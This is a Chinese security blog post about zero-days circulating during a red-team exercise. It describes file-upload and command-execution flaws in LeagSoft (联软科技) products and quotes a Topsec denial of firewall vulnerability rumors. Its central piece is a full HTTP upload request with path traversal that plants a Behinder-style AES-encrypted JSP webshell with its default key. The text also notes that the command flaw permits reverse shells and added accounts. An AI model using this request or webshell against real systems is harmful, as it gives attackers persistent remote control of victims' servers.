HW第三天:0day快递盒继续在线送day

  • A+
所属分类:安全闲碎

联软科技产品存在任意文件上传和命令执行漏洞:

漏洞详情:

任意文件上传漏洞,存在于用户自检报告上传时,后台使用黑名单机制对上传的文件进行过滤和限制,由于当前黑名单机制存在缺陷,文件过滤机制可以被绕过,导致存在文件上传漏洞;利用该漏洞可以获取webshell权限。(猜测利用黑名单的其他后缀名绕过)

命令执行漏洞,存在于后台资源读取过程中,对于自动提交的用户可控参数没有进行安全检查,可以通过构造特殊参数的数据包,后台在执行过程中直接执行了提交数据包中的命令参数,导致命令执行漏洞;该漏洞能够以当前运行的中间件用户权限执行系统命令,根据中间件用户权限不同,可以进行添加系统账户,使用反弹shell等操作。

POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx
-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> -----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath" ../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--


又一家来辟谣的

关于近期网络传播“天融信NGFW下一代防火墙设备存在漏洞”等情况的声明

在近期的网络安全演习中,随着攻防态势白热化,互联网社交平台、社区、个人博客等众多渠道也开始出现汇总各类通用框架、组件、安全产品、网络产品等出现的“0day”漏洞情报。天融信在近日发现网络上在传播关于一则通告“预警事项”的截图

 

此公告内容为使用天融信NGFW设备的一个用户被发现使用了弱密码,弱口令漏洞为事件型安全漏洞,并不是指设备本身存在漏洞。

此外,对于网络传播的天融信其他安全产品存在漏洞的消息,经核实大部分为虚假消息,小部分为旧版本漏洞。我们会继续加强天融信产品相关漏洞信息的监控,并及时跟进、公开处置信息,主动向相关用户推送防护建议,与用户协同维护网络空间的清朗与安全。

来源:https://mp.weixin.qq.com/s/8IOexnTwecIc22vAj-gWiA

听说还有其他骚操作?


HW第三天:0day快递盒继续在线送day

据说还有泛微的洞?(来自互联网)

HW第三天:0day快递盒继续在线送day

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: